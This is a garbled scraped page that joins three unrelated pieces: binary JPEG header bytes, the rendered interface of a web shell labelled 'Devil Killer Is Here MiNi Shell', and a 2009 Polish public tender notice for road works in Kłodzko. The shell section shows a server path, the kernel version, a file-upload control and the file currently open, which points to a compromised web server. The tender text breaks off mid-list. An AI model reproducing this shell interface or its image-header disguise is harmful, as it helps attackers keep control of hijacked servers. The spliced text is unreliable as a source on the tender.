JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090707/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090707/107021-N-2009.html

<p class="kh_header"><b>Kłodzko: Podniesienie konkurencyjności regionu Ziemi Kłodzkiej poprzez poprawę jakości gminnych dróg łączących lokalne centra aktywności gospodarczej           w mieście Kłodzku z siecią dróg krajowych

Część I Przebudowa skrzyżowania, na skrzyżowanie o ruchu okrężnym             z odcinkami dojazdowymi ulic: Dusznickiej i Objazdowej                         w Kłodzku.

Część II  Przebudowa ulicy Objazdowej w Kłodzku,
	

Część III:Przebudowa ulicy Nadrzecznej w Kłodzku,</b><br>
<b>Numer ogłoszenia: 107021 - 2009; data zamieszczenia: 07.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Kłodzko , pl. Bolesława Chrobrego 1, 57-300 Kłodzko, woj. dolnośląskie, tel. 074/8654600, faks 074 8674062.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.klodzko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Podniesienie konkurencyjności regionu Ziemi Kłodzkiej poprzez poprawę jakości gminnych dróg łączących lokalne centra aktywności gospodarczej           w mieście Kłodzku z siecią dróg krajowych

Część I Przebudowa skrzyżowania, na skrzyżowanie o ruchu okrężnym             z odcinkami dojazdowymi ulic: Dusznickiej i Objazdowej                         w Kłodzku.

Część II  Przebudowa ulicy Objazdowej w Kłodzku,
	

Część III:Przebudowa ulicy Nadrzecznej w Kłodzku,.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A.3.1. Część I -  Przebudowa skrzyżowania, na skrzyżowanie o ruchu okrężnym z odcinkami dojazdowymi ulic: Dusznickiej i Objazdowej w Kłodzku.

Główny przedmiot zamówienia CPV: 45233128-2 - Roboty budowlane w zakresie rond. 

	Przedmiotem zamówienia jest przebudowa typowego, czterowlotowego skrzyżowania ulicy Dusznickiej z ulicą Objazdową na skrzyżowanie o ruchu okrężnym z wyspą centralną typu rondo wraz z odcinkami dojazdowymi ww. ulic zgodnie z projektem budowlanym. Zewnętrzna średnica ronda - 32,0 m, szerokość jezdni ronda - 5,0 m, szerokość pierścienia - 2,0 m. Dojazdowe odcinki ulic zaprojektowane są jako skanalizowane z rozdziałem ruchu na jezdnie wylotowe o szerokości 3,5 m i jezdnie wlotowe o szerokości 4,0 m. Na odcinku przebudowy skrzyżowania projekt przewiduje wykonanie chodników o szerokości 2,0 m oraz ciągu pieszo - rowerowego o szerokości 2,5 m. Prace w ciągu ulicy Objazdowej są ściśle związane z II częścią niniejszego postępowania przetargowego. Teren pasa drogowego przyległy do projektowanej przebudowy przewidziany jest do rekultywacji wraz z uzupełnieniem zielenią niską oraz nasadzeniem drzew. 
Do zakresu robót należy:
-	usunięcie drzew i krzewów, kolidujących z inwestycją - Zamawiający przekaże  Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdu - kostkę betonową z wysepek rozdzielających należy ułożyć na paletach i złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	przebudowa zjazdu kolidującego z inwestycją,
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
-	budowa kanalizacji deszczowej,
-	czyszczenie i profilowanie rowów odwadniających,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemomtowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	budowa muru oporowego,
-	wykonanie nawierzchni jezdni, chodników,
-	wykonanie oznakowania poziomego i pionowego - zgodnie z posiadanym przez Zamawiającego i zatwierdzonym projektem stałej organizacji ruchu,
-	humusowanie, zasianie trawy i zasadzenie drzew.
	Na czas wykonywania robót Wykonawca jest zobowiązany opracować, uzyskać zatwierdzenie i wprowadzić projekt czasowej organizacji ruchu drogowego. Zamawiający dopuszcza na czas realizacji inwestycji całkowite wyłączenie z ruchu przedmiotowego skrzyżowania z następującym zastrzeżeniem:
-	przez cały czas trwania inwestycji należy zapewnić dojazd do firmy Agrol Sp.j., ul. Objazdowa 1.
Ponadto należy pamiętać, że budowa ronda będzie odbywać się w tym samym czasie, co prace związane z przebudową ulicy Objazdowej, które są przedmiotem drugiej części niniejszego zamówienia - A.3.2.	
Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy.
	A.3.2. Część II - Przebudowa ulicy Objazdowej w Kłodzku.
Główny przedmiot zamówienia CPV: 45233120-6 - Roboty w zakresie budowy dróg 

	Przedmiotem zamówienia jest przebudowa ulicy Objazdowej na długości 930,66 m pomiędzy skrzyżowaniem z ul. Noworudzką (połączenie z przebudowanym odcinkiem dojazdowym do istniejącego ronda), a skrzyżowaniem z ul. Dusznicką (połączenie z odcinkiem dojazdowym do ronda, którego budowa jest przedmiotem pierwszej części niniejszego zamówienia - A.3.1.). Na odcinku przebudowy ulicy Objazdowej zaprojektowano: 
-	chodniki o szerokości 2,0 m, 
-	ciąg pieszo - rowerowy o szerokości 2,5 m. 
Powyższe elemeny pasa drogowego oddzielone będą od jezdni pasami zieleni niskiej o szerokości od 0,8 do 4,8 m. 
	Na odcinku od skrzyżowania z ul. Zajęczą do skrzyżowania z ul. Noworudzką przewidziano wykonanie w pasie drogowym: 
-	zatok postojowych do parkowania równoległego do osi jezdni o szerkości 2,5 m oraz do parkowania skośnego do osi jezdni o szerokości 5,0 m,
-	dwóch zatok autobusowych. 
Teren pasa drogowego przyległy do projektowanej przebudowy przewidziany jest do rekultywacji wraz z uzupełnieniem zielenią niską oraz nasadzeniem drzew jarząb szwedzki. Na odcinku od 0+782 do 0+927 zaprojektowano umocnienie skarpy gabionami 1,0x2,0x0,5, długość 146,0 m i wysokość do 3,0 m.  
Inwestycja obejmuje również:
-	przebudowę skrzyżowania ulicy Objazdowej z ulicą Zajęczą wraz odcinkami dojazdowymi ulicy Zajęczej do tego skrzyżowania,
-	budowę kanalizacji deszczowej,
-	budowę oświetlenia ulicznego.
Do zakresu robót należy:
-	wykonanie projektu organizacji ruchu na czas trwania inwestycji, uzyskanie zatwierdzenia, a następnie jego wprowadzenie i utrzymanie oznakowania w trakcie robót - w projekcie należy wskazać sposób obsługi komunikacyjnej posesji korzystających obecnie ze zjazdów z ul. Objazdowej,
-	wycinka drzew, karczowanie pni - Zamawiający przekaże Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdów,
-	przebudowa zjazdów, 
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
-	budowa kanalizacji deszczowej: rury pcv o średnicy: 200 mm - 443mb, 300 mm - 243 mb, 400 - 193 mb, 500 mm - 190 mb, 600 mm - 33 mb, separtor o średnicy 2000 mm, osadnik o średnicy 2500 mm, studnie kanalizacyjne o średnicy  1500 mm - 10 szt,. 1250 mm - 16 szt., 2000 mm - 1 szt., studzienki ściekowe o średnicy 500 mm z pojedyńczym wpustem i osadnikiem - 29 szt.,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego: kabel YAKY 4x25 mm2 w rurzee osłonowej Arota 75, 36 szt. punktów oświetleniowych, słupy stalowe ocynkowane 8 m na fundamentach prefabrykowanych  - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemomtowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 3 km,
-	wykonanie nawierzchni jezdni, chodników i ciągu pieszo - rowerowego,
-	umocnienie skarpy gabionami,
-	wykonanie oznakowania poziomego i pionowego - zgodnie z posiadanym przez Zamawiającego i zatwierdzonym projektem stałej organizacji ruchu,
-	humusowanie, zasianie trawy i zasadzenie drzew.
Inwestycję planuje się zrealizować w dwóch etapach:
I etap	- przebudowa ulicy Objazdowej od 0+000,00 km (początek opracowania), do 0+416,87 km,
etap ten obejmuje przebudowę skrzyżowania z ul. Zajęczą, etap ten będzie realizowany w tym samym czasie, co budowa ronda na skrzyżowaniu ulic: Objazdowa, Dusznicka A.3.1., co należy również uwzględnić w projekcie organizacji ruchu na czas robót,
II etap 	- przebudowa ulicy Objazdowej od  0+416,87 km do 0+930,66 km (koniec opracowania, włączenie do istniejącej nawierzchni).

Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy.
	A.3.3.Część III -  Przebudowa ulicy Nadrzecznej w Kłodzku.
Główny przedmiot zamówienia CPV: 45233120-6 - Roboty w zakresie budowy dróg 

	Przedmiotem zamówienia jest przebudowa ulicy Nadrzecznej o długości 953 m. początek przebudowy znajduje się w linii końcowej zabudowy klasztornej Sióstr Klarysek od Wieczystej Adoracji, a koniec na skrzyżowaniu z ulicami: Nowy Świat, Półwiejska. Oprócz przebudowy konstrukcji jezdni (poszerzenie jezdni, wykonanie nowych chodników) w zakres inwestycji wchodzą: 
-	zabezpieczenia zagrożonych odcinków skarpy korpusu drogowego od strony doliny rzeki Nysy Kłodzkiej - żelbetowa konstrukcja oparta na palach, 
-	konstrukcja odciążająca istniejący mur oporowy przy budynku mieszkalnym nr 4 - konstrukcja żelbetowa wykonana wewnątrz korpusu drogowego,
-	zabezpieczenia części skarpy naruszonej w wyniku poszerzenia ulicy - kosze gabionowe. 
Ponadto w ramach inwestycji wykonane zostaną:
-	przebudowa istniejącej kanalizacji deszczowej
-	budowa odcinka nowej kanalizacji deszczowej,
-	przebudowa podziemnej infrastruktury energetycznej i teletechnicznej,
-	budowa nowego oświetlenia ulicznego.
Do zakresu robót należy:
-	usunięcie drzew i krzewów, kolidujących z inwestycją - Zamawiający przekaże  Wykonawcy zezwolenie na wycinkę drzew,
-	wykonanie pomiarów geodezyjnych, również powykonawczych,
-	wykonanie prac rozbiórkowych istniejących nawierzchni jezdni i zjazdów kolidujących z inwestycją - kostę kamienną należy złożyć w workach typu big - bag, krawężniki kamienne na paletach i odwieżć w miejsce wskazane przez Zamawiającego - odległość do 1 km,
-	przebudowa zjazdów,
-	przebudowa kolizji energetycznych i telekomunikacyjnych,
-	budowa kanalizacji deszczowej,
-	regulacja istniejących studni infrastruktury podziemnej,
-	budowy oświetlenia drogowego  - oprawy oświetleniowe ze zdemontowanych słupów oświetleniowych i zdemontowane słupy należy złożyć w miejscu wskazanym przez Zamawiającego - odległość do 1 km,
-	budowa muru oporowego,
-	wykonanie nawierzchni jezdni, chodników,

Inwestycję planuje się zrealizować w dwóch etapach:
I etap	- przebudowa ulicy Nadrzecznej od 0+710,14 m do 0+957,34 m (koniec opracowania, skrzyżowanie z ul. Nowy Świat i ul. Półwiejską)
Uwaga: jest to etap, w którym konieczne będzie wykonanie większości konstrukcji wzmacniających tj:
-	zabezpieczenia zagrożonych odcinków skarpy korpusu drogowego od strony doliny rzeki Nysy Kłodzkiej - żelbetowa konstrukcja oparta na palach, 
-	konstrukcja odciążająca istniejący mur oporowy przy budynku mieszkalnym nr 4 - konstrukcja żelbetowa wykonana wewnątrz korpusu drogowego,
-	zabezpieczenia części skarpy naruszonej w wyniku poszerzenia ulicy - kosze gabionowe. 
II etap 	- przebudowa ulicy Nadrzecznej od 0+000,00 m (początek opracowania) do 0+710,14 m.

Prace należy wykonać zgodnie z posiadanymi przez Zamawiającego projektami technicznymi poszczególnych branż. Dokumentacja techniczna stanowi integralną część SIWZ z zastrzeżeniem, że wszystkie ewentualnie wskazane z nazwy materiały (wyroby) należy rozumieć jako określenie wymaganych parametrów technicznych lub standardów jakościowych. Oznacza to, że zgodnie z art. 29 ustawy, na wskazane z nazwy materiały i wyroby Zamawiający dopuszcza zastosowanie równoważnych materiałów (wyrobów), nie gorszej jakości niż opisane w projekcie i specyfikacji technicznej wykonania i odbioru robót. Ciężar udowodnienia, że materiał (wyrób) jest równoważny w stosunku do wymogu określonego przez Zamawiającego spoczywa na składającym ofertę. W takim wypadku Wykonawca musi przedłożyć odpowiednie dokumenty opisujące parametry techniczne, wymagane prawem certyfikaty i inne dokumenty dopuszczające dane materiały (wyroby) do użytkowania, oraz pozwalające jednoznacznie stwierdzić, że są one rzeczywiście równoważne. Szczegółowy zakres i technologię wykonania i odbioru robót określają: 
-	projekty,
-	specyfikacje techniczne wykonania i odbioru robót,
-	przedmiary robót (ze względu na wynagrodzenie ryczałtowe za wykonanie zamówienia przedmiary robót wykonane i dostarczone przez Zamawiającego są jedynie dodatkową podstawą informacyjną - patrz rozdziały C, D niniejszej SIWZ),
stanowiące załączniki do niniejszej SIWZ.
	
Wykonawcy za realizację Zamówienia przysługiwać będzie wynagrodzenie ryczałtowe - patrz rozdział D.
Wszelkie koszty związane z realizacją przedmiotu zamówienia obciążają Wykonawcę. 
Wykonawca jest zobowiązany udzielić na powyższe prace gwarancji na min. 36 miesięcy.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.28-2, 45.23.31.20-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Zamawiający ustala wadium w wysokości: 
-	dla Części I zadania - 50.000,00 zł (słownie: pięćdziesiąt tysięcy złotych i 00/100 groszy);
-	dla Części II zadania - 70.000,00 zł (słownie: siedemdziesiąt tysięcy złotych i 00/100 groszy);
-	dla Części III zadania - 80.000,00 zł (słownie: osiemdziesiąt tysięcy złotych i 00/100 groszy);
2.	Wadium może być wniesione w formach przewidzianych w art. 45, ust 6 ustawy PZP. Wadium wniesione w pieniądzach Wykonawca wpłaca przelewem przed terminem składania ofert na rachunek Zamawiającego PBS w Strzelinie/o Kłodzko -  28 9588 0004 7100 1010 2000 0050, z adnotacją -Przetarg - poprawa jakości dróg gminnych. Potwierdzenie wpłaty wadium należy dołączyć do oferty.
3.	Wadium wniesione w innych przewidzianych ustawą formach Wykonawca składa wraz z ofertą. Termin wniesienia wadium w innych formach niż w pieniądzu upływa wraz z terminem składania ofert.
4.	Zasady zwrotu oraz zatrzymania wadium przez Zamawiającego określa art. 46 ustawy PZP.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> B.1. Warunki udziału w postępowaniu

	B.1.1 Część I -  Przebudowa skrzyżowania, na skrzyżowanie o ruchu okrężnym z odcinkami dojazdowymi ulic: Dusznickiej i Objazdowej w Kłodzku.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania takich uprawnień,
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto:
5.	Wykonali w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie:
a)	minimum trzy roboty budowlane dotyczące budowy i/lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) o wartości nie mniejszej niż 600.000,00 zł brutto (słownie: sześćset tysięcy złotych i 00/100 groszy brutto) każda 
lub
b)	minimum dwie roboty budowlane dotyczące budowy lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) na kwotę nie mniejszą niż 900.000,00 zł brutto (słownie: dziewięćset tysięcy złotych i 00/100 groszy brutto) każda. 
Wykazane roboty muszą odpowiadać swoim rodzajem przedmiotowi niniejszego zamówienia. Należy podać wartości oraz daty i miejsca wykonania oraz załączyć dokumenty potwierdzające, że roboty te zostały wykonane należycie - referencje wyłącznie od Inwestora wykonanych robót, protokoły odbioru;
6.	Dysponują lub będą dysponować potencjałem technicznym niezbędnym do  wykonania zamówienia.
7.	Dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia oraz posiadającymi kwalifikacje niezbędne do wykonywania zamówienia tj.:
a)	min. 1 kierownikiem budowy z min. 5 letnim doświadczeniem zawodowym, posiadającym uprawnienia budowlane w specjalności drogowej 
b)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności drogowej,
c)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych, 
d)	min. 1 kierownikiem robót posiadającym uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych
W/w  osoby winny być członkami właściwej Izby Samorządu Zawodowego oraz posiadać stosowne zaświadczenia.
e)	min. 1 geodetą posiadającym właściwe uprawnienia geodezyjne. 
8.	Posiadają środki finansowe lub zdolność kredytową na kwotę  min. 1.800.000,00  zł (jeden milion osiemset tysięcy złotych i 00/100 groszy), 
9.	Są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę   min. 1.800.000,00  zł (jeden milion osiemset tysięcy złotych i 00/100 groszy), 
10.	Oświadczą, że spełniają warunki określone w art. 22 PZP oraz nie podlegają wykluczeniu z postępowania o udzielenie zamówienia zgodnie z art. 24 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych,
11.	Zgodnie z art. 26 ust. 2 załączą dokumenty wymienione w § 1 ust.1 pkt 2, 3, 4, 5,
ust. 2 pkt 1, 5, 5a (jeżeli dotyczy), 6 oraz ust. 3 pkt 2, 3 Rozporządzenia Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać Zamawiający od Wykonawcy oraz form, w jakich te dokumenty mogą być składane  (Dz. U. Nr 87 z dnia 24 maja 2006 r. poz. 605 z późn. zm.).
	
	B.1.2. Część II - Przebudowa ulicy Objazdowej w Kłodzku.

O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
1.	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają   obowiązek posiadania takich uprawnień,
2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
3.	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
4.	Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 PZP,
a ponadto:
5.	Wykonali w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania, a jeżeli okres prowadzenia działalności jest krótszy to w tym okresie:
a)	minimum trzy roboty budowlane dotyczące budowy i/lub przebudowy dróg wraz z infrastrukturą podziemną (rurociągi kanalizacji deszczowej i/lub kanalizacji sanitarnej i/lub podziemnych instalacji energii elektrycznej i/lub sieci gazowych i/lub sieci wodociągowych i/lub sieci teletechnicznych) o wartości nie mniejszej niż 1.000.000,00 zł brutto (słownie: jeden milion złotych i 00/100 groszy brutto) każda 
lub
